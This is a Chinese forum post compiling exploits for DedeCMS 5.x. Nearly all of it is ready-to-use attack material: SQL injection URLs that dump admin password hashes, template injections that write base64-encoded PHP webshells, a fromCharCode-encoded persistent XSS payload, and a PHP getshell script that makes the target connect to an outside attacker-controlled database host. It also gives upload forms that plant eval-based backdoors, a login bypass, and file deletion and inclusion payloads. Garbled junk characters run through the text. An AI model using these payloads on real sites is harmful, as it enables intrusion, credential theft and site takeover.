dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞5 ^6 A% P6 c5 n0 ~* T/ w2 n
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
+ b3 z5 z2 J' W# A+ S$ b
* o# j- a+ b5 H9 J
0 Q( V- ?- P, o% I. I
. i3 y4 ~- |# G2 Z( N& l0 H8 v$ S6 o7 S: S" B- W: V4 D! W# c

6 r; m3 V( k. W  f: Z. j# {! @" r( r/ L
. p' q; @9 q6 Y# N* r( x

5 q* `  `# j- v) |; a# wDedeCms v5.6 嵌入恶意代码执行漏洞
5 Z5 J3 T, D# b- c8 C注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}+ C9 ~# n* z$ W7 G$ G$ t$ ~' o$ w; [
发表后查看或修改即可执行5 h9 X$ J1 F' |2 i
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}2 v& n$ E! z6 C0 ]! }( ]
生成x.php 密码xiao，直接生成一句话。5 I+ G: g1 K. I, p) H
7 w* O- U- \9 {7 v' z2 [

( N* O# V4 E3 v) [7 A8 W" \. p0 a  |4 l
) J2 Q: l( _, u
3 {5 D; g% I7 X& \; Q
" R( a3 Z3 x" i7 p& o8 w: t
" X6 |+ t: d6 U' w3 ]0 N0 P
, g7 D  I; N! w+ x* _
Dede 5.6 GBK SQL注入漏洞6 Y+ l# r# J0 Y6 V( s/ [+ V
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
* p  V5 l7 F& B9 f$ y' Uhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞! X8 `8 Z1 X2 A* r! `/ P8 k
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
9 J7 v' _0 m. Z' n9 l8 ~, \! p( v) S6 N: j/ c/ K9 M! F
9 P  p. _  {4 O/ J9 w
, h$ x! H& q5 @

6 r; m* w" z& p* u# ]- T' d8 i7 d, F7 a
- k4 {0 q0 R, R( G- y+ h! R
DEDECMS 全版本 gotopage变量XSS漏洞, d1 E( |6 |+ C. T! P
1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。 ( q  ?& r0 J, p! V: S1 F
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
+ g$ S2 Y, M3 n  G& R
6 v$ N5 e2 E& r: ?3 J1 K9 n# z2 \+ g; z6 l; L
2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。 - X8 ~- Q: J6 Y% ~1 @/ G
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell
# \% N8 v! n7 s) L3 g. R6 N  |#!usr/bin/php -w2 |' t, O; B; M* J
<?php
6 e5 Y$ k# U$ v" i5 S1 a' ^* S/ w( Perror_reporting(E_ERROR);
" ?7 y0 u3 A, N/ H0 _set_time_limit(0);
0 v: _/ F1 D9 _! eprint_r('
& N' j2 E5 i- V  ^( @7 t' nDEDEcms Variable Coverage, U4 \- R4 S# Y
Exploit Author: www.heixiaozi.comwww.webvul.com
);
8 q; b$ ?6 f$ \& secho "\r\n";8 E. A  q7 c/ C6 e
if($argv[2]==null){
/ h, ?' E& Z; Wprint_r('4 v9 o( ^& i6 V) K  {% ]" s1 {
+---------------------------------------------------------------------------+2 O% W# h' R; }- r( V
Usage: php '.$argv[0].' url aid path
0 v& f5 A1 A4 l0 J( F) ^aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
; w, x. z9 z  W$ P$ VExample:
  J2 l( N. P- i6 h3 q, F" rphp '.$argv[0].' www.site.com 1 old& `9 y4 E$ j/ d! r, o
+---------------------------------------------------------------------------+
1 m5 H% A$ J" v');
% D/ n6 n# x% N' r. s8 k* h, Xexit;% w+ K- v& ?" @& W) Q9 [' Z7 M( V2 \3 V
}
$url=$argv[1];/ s, `: z; x4 F- J& u) T8 @
$aid=$argv[2];5 Z9 S8 Y$ D" m6 Y' q! E3 D& D
$path=$argv[3];! x7 s4 Q' e& d) E2 p: M: @
$exp=Getshell($url,$aid,$path);! @9 v8 ]& |9 g$ D* v
if (strpos($exp,"OK")>12){, n6 x6 V; D2 h7 @3 M
echo "
+ s4 a1 F* y' T8 W* rExploit Success \n";
; G- b6 p4 `% w: B1 e  s. Oif($aid==1)echo "
" b( g1 Q) \: s* FShell:".$url."/$path/data/cache/fuck.php\n" ;% q, n& W* }# K8 z5 B2 L0 @8 L

# Q# a% c/ A# O7 T( d
& Q: _6 u: x7 P# O' n3 H8 tif($aid==2)echo "
  p, K: R6 b6 M8 r4 q5 b) jShell:".$url."/$path/fuck.php\n" ;) y$ \( \: k+ Z9 E. k8 W% h
+ u. f% ^+ I/ p7 [( B! x- B
2 [  q& e. W( F: F+ o
if($aid==3)echo "
' |' q" X- `$ r  K( N4 ?0 b8 _Shell:".$url."/$path/plus/fuck.php\n";
6 O* j& c- E( L* ^6 i8 U  }" V' E% C% Z9 h9 i
. h) ^- a. V5 V$ W0 k7 _4 G" t
}else{; r8 D8 A4 D9 n
echo "5 \' v+ l, X4 G9 _7 b2 m5 c
Exploit Failed \n";) f% S! W; t0 n8 d4 ?. m
}
: I- h; S, X8 q. q7 ^" U8 P! \function Getshell($url,$aid,$path){/ x, x( Q+ a( e
$id=$aid;& L$ c# n& K  O+ m
$host=$url;1 H2 g. N4 M. u; _0 \  ]
$port="80";, l. f6 z: B$ ~5 [& G5 A
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
! k. k! G5 y+ H: v, N9 S. V) f$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
9 l+ H/ {0 K  u$data .= "Host: ".$host."\r\n";+ L9 d% [1 Z; P* q5 {
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";. Y+ Q2 j7 W8 F$ C0 Y% i+ @8 R
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";; X' U4 {/ D8 z& I; y6 y9 X# K* G; T
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";! h! `0 S8 K" A
//$data .= "Accept-Encoding: gzip,deflate\r\n";! L5 M4 n$ b2 H! ^. \: ]6 ?: y* q
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";1 n6 r1 `0 m" j  d, o2 M* w
$data .= "Connection: keep-alive\r\n";% n# ^( E- y) F4 c; d4 R2 d4 _
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
! e2 b7 Y3 ^$ c$ X+ ~. ?4 @$data .= "Content-Length: ".strlen($content)."\r\n\r\n";$ B- [+ o. w* v' b
$data .= $content."\r\n";" E/ c1 V4 ?. C  \* Z3 I! u
$ock=fsockopen($host,$port);
* L, h' L/ k( W$ A! P4 e: p& Gif (!$ock) {" _1 J2 M" @' k1 e" U6 s& r
echo "0 [# i  ~" V! g3 q1 n1 S
No response from ".$host."\n";& P( @5 _* X. L' J/ Z+ x$ L
}" [" r# k& u' H  e9 s
fwrite($ock,$data);
8 r4 E% a2 J4 E2 c; P, J6 y1 Nwhile (!feof($ock)) {4 O+ }6 D* [. Q  N# C7 f
$exp=fgets($ock, 1024);
7 e  R, r0 C( {6 q% b2 qreturn $exp;
! _7 e7 t, {; t* ^5 r7 P  b}
: ^* W' x9 E5 [( B3 s/ J}
2 P3 X: R# v0 f( v) D
5 S% Z0 ^, E2 Y2 Z0 l( ~, D9 w1 u% m! u5 q9 S/ ^
?>  I' n* y3 r  b! l, X. i9 I- g& y
8 R. P; N2 N9 `
/ V. |  G8 ?8 z4 |

7 p3 ~1 I; B4 H
& F: B" |# z4 i: j- B  G, }( a+ S' y  S

; X! J+ x- I; C& f( @; r6 e; n! z' Q6 l9 _4 Q0 n

; g  M( \6 i: }- i2 w/ Q
* L- `# G1 _* i6 d
. q( ~" j. W- _: j9 cDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
# d5 D/ s' n. }! u3 _* Vhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root  o4 e# e9 l" T( X

) m* k" y) v" y9 V7 a0 P, B/ A) k! n8 L6 ]! ?
把上面validate=dcug改为当前的验证码，即可直接进入网站后台' {8 O/ v- u7 Y5 @* u2 y7 B* J3 E

7 w+ C5 x# o) h: ]* D7 Q# v9 u7 j
此漏洞的前提是必须得到后台路径才能实现
/ D% t8 A8 X" L( Y2 s/ }2 |6 c6 d
+ S7 ~; O4 ?# c8 G5 L( }2 f( `/ [# z9 g1 U4 J

5 m- }* l- ?9 O0 l# ]' c- g' P. _( n& F3 G
1 ^" \0 }/ W( E
! E8 J$ X2 @* r6 O+ G0 C8 i  L2 t

0 c; m- P8 Z( e3 `& I! x+ p! ?+ q4 W$ i6 N/ x; [
  k/ S; d% d' ^; x0 u1 O4 L

. F0 H" C, z" V' g! VDedecms织梦标签远程文件写入漏洞
7 \$ X, x7 I8 }) k3 K) b前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
( m, p" w0 H6 @0 l$ u5 S
' G6 c) V' }9 @5 b) j. N) H* e
) B2 K- l2 }* V* S6 S3 u/ d再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
' K1 a8 k2 ^6 P0 I/ f8 x<form action="" method="post" name="QuickSearch" id="QuickSearch">
& L  E8 Y# L& K: O  V: F' L<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
. T$ F" x/ @# r8 s; d8 h* |<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
1 {9 A5 F$ w3 u) x8 [$ y<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />! r" l6 {% _% t( m' G" x: |
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />3 N1 A4 O! r) U
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
* ?2 }' K$ q, }9 y7 P- j7 b<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
/ ~, Z2 O. [7 n1 F5 w<input type="text" value="true" name="nocache" style="width:400">) I$ Z2 k: }8 S9 s
<input type="submit" value="提交" name="QuickSearchBtn"><br />% |) a7 X) k( l
</form>% N1 J0 ~0 G1 e
<script>
! Q4 d9 e4 y& z6 Jfunction addaction()0 }' t) o1 p) q+ _) K; l' k
{
, W5 G4 F# l: f$ F5 Rdocument.QuickSearch.action=document.QuickSearch.doaction.value;
3 J6 ], P* }2 v+ [}) G- O7 z  ], f* ]7 c1 I% J
</script>6 G3 Y! |/ {& ?

( }) t% V  `2 k4 h0 C: m- X
: X# f. r, Z( S1 E, O3 E( H. [: d7 B3 B  l7 X" U9 m( t

; z  E& W! J1 \1 _% L
& Q, R$ p1 |+ R$ z" i6 e. J6 U: ~, `; q

. J4 k$ b4 l. G: q' j6 H' Q1 R7 J, h1 O" k7 i! j
; T0 w5 d1 W3 I3 Y5 v

- K* |9 G* Q' I! i% u/ K, rDedeCms v5.6 嵌入恶意代码执行漏洞- X5 T5 a. I, B
注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行6 k$ o& \, ~: ]  y; D" V' h
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
' v! R6 }4 @' x" b" i生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得! G6 X7 J, X  M% L
Dedecms <= V5.6 Final模板执行漏洞  u' }& B- L/ F% ^/ d
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
uploads/userup/2/12OMX04-15A.jpg
$ G$ ^2 `2 u1 a- x" D
$ H( k! @$ q  b: m% D
2 u# s. M+ p0 T1 |模板内容是（如果限制图片格式，加gif89a）：8 R0 Y2 r2 u* k5 h2 X( k& T
{dede:name runphp='yes'}2 F. G( e3 P& i# Z% y  Z
$fp = @fopen("1.php", 'a');, H7 O, T( v# v6 f/ o6 O9 w
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
% D$ Z% C) y6 _" x: a5 t7 @+ L@fclose($fp);
- B# m' Y* Q  t& H) N: h1 x; _{/dede:name}
, ~1 @" e) [6 ~' r2 修改刚刚发表的文章，查看源文件，构造一个表单：+ U4 d' K/ D8 D" w. {
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
9 Y, c# m5 A4 d* x4 ]<input type="hidden" name="dopost" value="save" />* p6 E( \+ ?8 _% o8 X1 q
<input type="hidden" name="aid" value="2" />
5 }& F- k: K: P<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
1 H1 D& A- ?( J/ w1 S6 U( L<input type="hidden" name="channelid" value="1" />
; E4 r. Y! c& l- K& b/ z% w<input type="hidden" name="oldlitpic" value="" />
9 W" b8 F* C3 |, B' M5 ]- ~+ i8 d<input type="hidden" name="sortrank" value="1275972263" />, g6 _4 B# k, V% k* m" e
/ u1 j" U, Q7 s9 M$ {0 f2 |: s

- z( B4 t, H/ j: W, `/ d<div id="mainCp">
1 D8 e2 y2 A3 S' n<h3 class="meTitle"><strong>修改文章</strong></h3>
3 G. q8 L, @( C5 ~, u- \  l% H$ v! C9 P8 y
& ~7 C3 T9 X" h2 g/ a1 _
<div class="postForm">$ r7 \2 D% {. O0 ]: F! n
<label>标题：</label>: @8 p) G1 K- I* j7 i  ?) e
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
. q, a9 F9 ?; I& I$ Z8 C
9 s5 b. ]( Y" z0 \$ M
% L; Y) x$ U3 x2 o4 c. |<label>标签TAG：</label>  M' I+ f1 A6 g3 h% G+ b2 H6 G
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)4 [2 N8 ?' l* B9 x8 \

. A- o) c+ ]: \' w2 N
! N  B4 b; O2 u7 j8 B$ i<label>作者：</label>
) H1 A# z2 L0 X3 k6 c<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
4 W0 Z7 d( E0 j; F) j, E
2 F6 v" }4 o4 s7 d8 I$ e+ V1 ?2 }; g! j( _( _) l0 j: B5 `4 H
<label>隶属栏目：</label>; {% f7 q$ H7 x
<select name='typeid' size='1'>
4 ~0 m5 v0 ?0 X' Y- e' V<option value='1' class='option3' selected=''>测试栏目</option>1 G5 @: b. F0 \( y8 |2 t8 F8 f
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)& r2 q2 J3 i% Z$ Z9 l- A. e

/ C) v. F; U7 b8 r  D) V" \+ r# E8 [
4 y0 |. ]7 w5 g3 {/ ~; k" v9 N<label>我的分类：</label>
1 F+ {& u* i! `) V<select name='mtypesid' size='1'>. x. W% l! u# q, ]# S# T
<option value='0' selected>请选择分类...</option>; v& Z2 `2 z/ p. A  T
<option value='1' class='option3' selected>hahahha</option>
7 E2 Q( _8 c# [, C. ~</select>
5 w" d( z& N/ o: z( d
- U7 U! U1 v# Q, \  a; U: y1 ^5 C6 w/ p
<label>信息摘要：</label>
7 ~& t% y  q6 t) {4 Q3 p<textarea name="description" id="description">1111111</textarea>% }# x8 g4 n2 @9 y
(内容的简要说明)6 ?7 q3 Y2 H/ H7 i+ K( j. f2 G

! P6 q2 t# A& _  H
3 t* ?: X  F6 E' L2 d<label>缩略图：</label>
7 F+ H: ^! v: O( j7 f<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
* q% @* S; ^9 q" U( _( x7 o; t4 m" E4 F; L/ _% I

/ a3 y  b9 [# g7 z! d" t<input type='text' name='templet'
- }$ x! _& U3 W/ L/ d8 x4 ?value="../ uploads/userup/2/12OMX04-15A.jpg">. V+ _" H$ n/ J' n. I9 a
<input type='text' name='dede_addonfields': i/ d$ ~2 g* j4 w9 Z1 k. @2 S8 T
value="templet,htmltext;">（这里构造）
" ~4 q& [5 ^: l' ]</div>
- {$ H* |0 H3 k6 ^4 A- R1 q# Q8 V, j3 f3 P6 V* j( Q$ ]( ?: Y* s" O# t: @
5 k$ a2 K3 D9 d* K: F8 v
( X4 j( z! I* q: @$ _: V3 A
<h3 class="meTitle">详细内容</h3>+ D9 L' i* ?! h7 {5 J; _  m" d
$ R% x9 v* V3 @$ P" h, p
. l3 T. \% S. v7 J# r
<div class="contentShow postForm">
" y/ F* w. p, `" d7 }) R8 y1 C7 d<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>/ J, p- {, Y4 r0 ^5 ]

6 I& n" o7 k( j, @  g3 c3 |: k) \3 @8 [$ ?5 D1 A# h/ b
<label>验证码：</label>
- i; ~2 W9 ?/ L7 [2 p. U  d<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
3 V* o9 B& e4 f  W- G8 Y<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
4 S+ t- w- h" K, M- `" l
5 m% ~( V3 ?; R  {, K8 X/ b0 n" T, H& ?; H( `0 C8 {
<button class="button2" type="submit">提交</button>/ M7 L! H; e9 {7 i. z1 A
<button class="button2 ml10" type="reset">重置</button>
7 d; L) n' I3 S9 Y% l</div>
$ n9 W" z+ ^7 @8 J$ l6 c! g) x' U: ]

0 q/ t; K# X, M9 C</div>+ B# W% t# A: ]+ f! `4 T7 Q
  i5 |0 o! k/ q0 D
: G2 c  i. f; a$ U
</form>
) t# D% q# `1 m; w/ o9 J0 H
% U- B' w4 x) E5 e* [
- L0 ~2 S* _  a! }: y提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：2 E4 Q$ A/ M$ @
假设刚刚修改的文章的aid为2，则我们只需要访问：: Z1 m  y. a, r, m  j
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php' G0 K  v1 a' y) m* h

( t; e: b5 [$ L: a
/ q4 r/ L; c' t- e

( W! V1 b( h! M; e& e. |# a2 M1 d/ a' p  T

% C! j  M6 U% }$ s2 m' ?7 \; l1 c' D0 K, e0 z/ l

$ L1 b  e6 {) U7 o5 l% r
7 \9 r+ g& l. Y6 R2 x! Y" B
. a9 q1 e7 n9 n! }7 B. Z. y: F0 ?, M: ~$ x& u' ]( K
% B" V2 Y. O) n, M
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
. |% r: ^; b" d2 pGif89a{dede:field name='toby57' runphp='yes'}
8 ]* e3 J0 g. w2 Zphpinfo();
- ~% m7 [* Z, P{/dede:field}
- b" [: h4 [  E9 F4 J' ?保存为1.gif# W3 A! ]3 J% p, N$ q
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
( H& D3 X: o- L% F+ ?<input type="hidden" name="aid" value="7" /> / p2 H6 E+ A( I; H; @3 V% u
<input type="hidden" name="mediatype" value="1" />
1 D- e7 |' t- E3 U. ~6 _: K- ]<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 0 e- t" h! ~6 h) ]
<input type="hidden" name="dopost" value="save" /> 2 B+ x$ G% L& r' U8 i
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> * }- C; T  Q8 C
<input name="addonfile" type="file" id="addonfile"/>
0 H7 Y% d4 E7 F' ~3 h/ ], N<button class="button2" type="submit" >更改</button>   o% ^$ P; E: e
</form>
' R5 `& Y% m2 _( `+ b) @4 D9 l/ Z3 X4 f: {) j
1 h% B8 f& b3 H3 ?/ f" s/ t
构造如上表单，上传后图片保存为/uploads/userup/3/1.gif0 y$ c0 z9 d1 k% g
发表文章，然后构造修改表单如下：$ G" ]: s. @: T; W" Q

; O* K+ [, [+ C
2 q6 ]! \6 _+ n% g<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 8 ~$ \- y4 _( X, _
<input type="hidden" name="dopost" value="save" />
6 c( p  e: p( b3 F<input type="hidden" name="aid" value="2" /> 4 c8 [/ p# N! m* q5 b' X! u
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
. c+ w- O! C7 D<input type="hidden" name="channelid" value="1" />
& ?' h- F% j/ S/ W- C6 D: r% g<input type="hidden" name="oldlitpic" value="" /> 2 E' w7 h# T" d- i8 q5 a4 [  O7 ?
<input type="hidden" name="sortrank" value="1282049150" /> ) P+ Z$ `  w. r0 m4 P
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 9 g' l( i/ t' T
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> # D2 I# }0 u# d: D+ Q
<select name='typeid' size='1'>
! J7 H8 _% Y4 D; z9 C: ?8 n<option value='1' class='option3' selected=''>Test</option> ; A, D. W& V1 j" d7 Q
<select name='mtypesid' size='1'> 5 w: ]2 v4 D$ n) A  U0 |
<option value='0' selected>请选择分类...</option>
6 S, L& e/ u6 l9 a) M' r<option value='1' class='option3' selected>aa</option></select> 4 ~$ M+ Y( g' ]
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> . `# L, @% h: R! F& n( _8 t
<input type='hidden' name='dede_addonfields' value="templet">
7 l/ g. f* I6 r. l5 J9 d4 C: F<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 8 i1 |5 L' |0 X6 K- p
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> - n. Y& Q$ e. \) ]" f5 J
<button class="button2" type="submit">提交</button> ! p& T5 d4 ^" F" e0 i
</form>
' N8 D" @# U- X: ~
4 f% z9 Z3 p3 N& x8 P
! ~8 e5 w4 m) Z% N5 T: {. k8 A, Q3 }* v( ?; b

; c7 f! B8 O4 t. L1 j& c+ R( U( c4 s$ V# x9 k8 ?8 ^$ n9 n+ T
  \( |8 _. \8 _

  F- `: F" R2 }5 }. J! h2 o  T+ M& y0 |

+ w$ E+ Z6 b" j" H' Z5 E
, s% p, L. j$ j$ Y; f% r- E( a' Q
: @3 |6 O3 @  L- l2 |8 g; {% }, a; O- K% K9 P5 x6 L0 u$ Y
织梦(Dedecms)V5.6 远程文件删除漏洞
/ ~' D4 h$ B/ jhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 4 h' X5 j8 C7 E# e
http://www.test.com/plus/carbuya ... urn&code=../../
" `- B- n: S, e+ E. _6 J/ A6 R0 q5 |8 W% P" Y  f5 Z. K

3 H, T$ c/ W" m9 q/ y; |
2 G7 K" c+ s) A$ X, z# K
) U/ j1 f% p& C- f% O
9 B# B# ^4 J  }; b* A9 f) M. s  O2 r2 F- P3 I
" t7 t- f( O* r' ~5 Q. g8 C; b7 Y
$ l5 V$ k, R( T7 H$ R* l/ M1 l

& k6 ~7 @" L/ E* a2 T
6 _) Z* n( i- A0 [% qDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 2 P. R; ?3 C. P5 D7 U; }5 x+ p0 v
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`/ f, ]* ^4 h# Y3 j; H
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD52 l2 a0 ^4 B1 A; J: D- z

6 O2 a" X) V* ~2 M5 N& a. k% }0 ^% s7 z  c$ `

; I/ R" J+ R" Q  ^) a6 r# `6 @6 H3 O+ |$ Q: G; G5 q; M  ]
3 g1 A/ w% O9 T% t% A

# T# J: h# L6 r. W+ J- g. C
5 ^# O9 Q7 g: n4 L( b5 p/ T: T. Z! G4 q5 d- n0 g
. N3 s& t! p7 D) A; d3 X5 w: D

  p+ G' q5 o$ C- W3 ]. K织梦(Dedecms) 5.1 feedback_js.php 注入漏洞8 F' X( C/ w4 I* r; ]+ r* I
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='8 J; n) d' k( Q( S

, H8 `" V4 f8 y  ^: f5 Y+ Q$ S$ {1 O5 D3 v
  R$ {2 Y" \' i: `9 l2 t) A+ E5 ?
. k8 D* a# l0 p8 o8 _6 |' |" V, D- z
# e% ^1 L6 G( w& z3 N3 T

+ r" H: {6 `! z& ^5 K* \, @( d1 f0 b- H, b2 ?

# l+ m. J/ _5 i4 d& B4 G, v* v: S0 z
$ c& t' h$ l& ^& u: _) U# d) r. ]! G( H- |
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
- L7 m; y# d1 W# y, c6 @<html>( K+ v9 \9 G+ O
<head>
$ W8 L1 _- S9 a' T8 e<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
5 i& y9 p, o5 m$ {2 Q3 Q# U</head>& P" [3 m# h; A
<body style="FONT-SIZE: 9pt">
* a* W  F/ z" `- Q---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />7 h+ Q7 ?! {- F' V
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
6 {: m- T1 P/ n) t. p<input type='hidden' name='activepath' value='/data/cache/' />6 r3 @3 o, U3 Y& G+ P( k9 A
<input type='hidden' name='cfg_basedir' value='../../' />
( P, O7 @  a0 L5 I7 l/ A& q9 W<input type='hidden' name='cfg_imgtype' value='php' />
4 f" N) P( x% n7 h% D<input type='hidden' name='cfg_not_allowall' value='txt' />
0 N5 Y; r# Z) Z3 B8 e8 e9 ^<input type='hidden' name='cfg_softtype' value='php' /># z$ F9 F& W  N* ^" [
<input type='hidden' name='cfg_mediatype' value='php' />/ ]( D6 v6 @" [' `1 y) t/ _& U1 S
<input type='hidden' name='f' value='form1.enclosure' />
